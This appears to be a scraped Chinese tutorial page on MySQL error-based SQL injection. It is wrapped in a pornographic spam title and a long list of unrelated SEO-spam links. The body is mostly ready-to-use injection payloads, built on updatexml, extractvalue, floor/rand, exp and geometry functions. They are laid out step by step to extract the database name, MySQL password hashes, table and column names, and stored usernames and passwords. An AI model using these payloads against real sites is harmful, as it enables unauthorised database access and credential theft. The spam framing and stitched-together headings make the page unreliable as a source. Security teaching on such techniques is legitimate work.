中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

電商網(wǎng)站建設(shè)渠道網(wǎng)站開(kāi)發(fā)培訓(xùn)

電商網(wǎng)站建設(shè)渠道,網(wǎng)站開(kāi)發(fā)培訓(xùn),購(gòu)物網(wǎng)站支付頁(yè)面制作,寺廟網(wǎng)站建設(shè)方案報(bào)錯(cuò)注入報(bào)錯(cuò)注入定義代碼展示常用的報(bào)錯(cuò)語(yǔ)句1.獲取數(shù)據(jù)庫(kù)名稱(chēng)2.獲取mysql賬號(hào)密碼3.獲取表名4.獲取字段名5.獲取賬號(hào)密碼報(bào)錯(cuò)注入定義 報(bào)錯(cuò)注入:利用sql語(yǔ)句的不規(guī)范,獲取相關(guān)sql提示信息 代碼展示 常用的報(bào)錯(cuò)語(yǔ)句 select first_name, last_name FROM…

報(bào)錯(cuò)注入

    • 報(bào)錯(cuò)注入定義
    • 代碼展示
    • 常用的報(bào)錯(cuò)語(yǔ)句
      • 1.獲取數(shù)據(jù)庫(kù)名稱(chēng)
      • 2.獲取mysql賬號(hào)密碼
      • 3.獲取表名
      • 4.獲取字段名
      • 5.獲取賬號(hào)密碼

報(bào)錯(cuò)注入定義

報(bào)錯(cuò)注入:利用sql語(yǔ)句的不規(guī)范,獲取相關(guān)sql提示信息

代碼展示

在這里插入圖片描述

常用的報(bào)錯(cuò)語(yǔ)句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#獲取當(dāng)前使用的庫(kù)
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#獲取數(shù)據(jù)庫(kù)敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.獲取數(shù)據(jù)庫(kù)名稱(chēng)

1' and info() -- 

在這里插入圖片描述

2.獲取mysql賬號(hào)密碼

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因?yàn)橐粭l只能顯示32字符,所以?xún)啥纹唇觿t為mysql密碼
在這里插入圖片描述
在這里插入圖片描述

3.獲取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在這里插入圖片描述

4.獲取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在這里插入圖片描述
借助burpsuite

在這里插入圖片描述
在這里插入圖片描述

在這里插入圖片描述

5.獲取賬號(hào)密碼

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在這里插入圖片描述

http://www.risenshineclean.com/news/11938.html

相關(guān)文章:

  • 長(zhǎng)春網(wǎng)站制作都找源晟27seo搜索優(yōu)化排名
  • 網(wǎng)站正能量不用下載直接進(jìn)入主頁(yè)可以嗎搜索引擎哪個(gè)好用
  • 如何查看網(wǎng)站備案號(hào)天津seo博客
  • 手機(jī)網(wǎng)站制作哪家便宜日本比分算1:1
  • 網(wǎng)站手機(jī)微信三合一怎么做搜索引擎營(yíng)銷(xiāo)的優(yōu)勢(shì)和劣勢(shì)
  • 網(wǎng)站基礎(chǔ)知識(shí)域名5個(gè)點(diǎn)品牌定位
  • 柴溝堡做網(wǎng)站公司seo網(wǎng)站推廣方式
  • 做糕點(diǎn)哪個(gè)網(wǎng)站鄂州網(wǎng)站seo
  • 建設(shè)網(wǎng)站的公司如何做網(wǎng)站設(shè)計(jì)
  • 論壇網(wǎng)站建設(shè)軟件網(wǎng)站優(yōu)化公司認(rèn)準(zhǔn)樂(lè)云seo
  • 網(wǎng)站服務(wù)器證書(shū)有問(wèn)題超級(jí)外鏈發(fā)布工具
  • 金華建站價(jià)格深圳電子網(wǎng)絡(luò)推廣查詢(xún)
  • 起零網(wǎng)站建設(shè)信息流優(yōu)化師簡(jiǎn)歷怎么寫(xiě)
  • 北京大興網(wǎng)站建設(shè)首選公司技術(shù)培訓(xùn)平臺(tái)
  • 張家港網(wǎng)站設(shè)計(jì)百度推廣賬戶(hù)優(yōu)化方案
  • 如何做賺錢(qián)的網(wǎng)站東莞快速排名
  • 網(wǎng)站服務(wù)器到期查詢(xún)純注冊(cè)app拉新平臺(tái)
  • ui設(shè)計(jì)定義seo流量工具
  • 有哪個(gè)網(wǎng)站專(zhuān)業(yè)做漫畫(huà)素材的寧波百度關(guān)鍵詞推廣
  • 網(wǎng)站群建設(shè)公司排行榜百度搜索資源平臺(tái)官網(wǎng)
  • 2345網(wǎng)址導(dǎo)航12年11個(gè)旺道網(wǎng)站優(yōu)化
  • 專(zhuān)門(mén)做男士用品的網(wǎng)站長(zhǎng)沙企業(yè)seo優(yōu)化
  • 上海市建設(shè)和城鄉(xiāng)建設(shè)委員會(huì)網(wǎng)站seo優(yōu)化公司排名
  • 備案 網(wǎng)站 漏接 電話(huà)企業(yè)網(wǎng)站是什么
  • 高價(jià)做單網(wǎng)站網(wǎng)站seo排名優(yōu)化工具在線(xiàn)
  • 動(dòng)態(tài)網(wǎng)站建設(shè)教程外匯交易平臺(tái)
  • 廣州做網(wǎng)站lomuw網(wǎng)站建設(shè)及推廣優(yōu)化
  • 柳州網(wǎng)站優(yōu)化公司網(wǎng)站seo快速優(yōu)化技巧
  • asp動(dòng)態(tài)網(wǎng)站建設(shè)google下載手機(jī)版
  • 淘寶客的網(wǎng)站怎么做的互聯(lián)網(wǎng)推廣軟件